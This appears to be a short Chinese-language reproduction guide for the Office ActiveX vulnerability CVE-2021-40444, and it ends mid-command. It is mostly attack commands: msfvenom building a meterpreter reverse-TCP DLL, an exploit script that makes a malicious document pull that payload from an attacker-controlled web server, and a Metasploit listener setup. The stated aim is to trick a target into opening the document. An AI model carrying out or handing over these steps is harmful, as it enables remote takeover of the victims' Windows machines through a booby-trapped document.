利用过程:在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档
复现环境:Ubuntu + WIN10
利用工具:Github:https://github.com/lockedbyte/CVE-2021-40444
0x01 生成恶意dll :
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll > shell.dll
需要提前下载lcab库
生成木马,url为打开文档后拉取恶意文件的web地址
python3 exploit.py generate test/shell.dll http://xxx.xxx.xxx.xxx:8088/
0x02 msf监听:
use exploit/multi/handler
set lhost xx.xx.xx.xx
set lport 4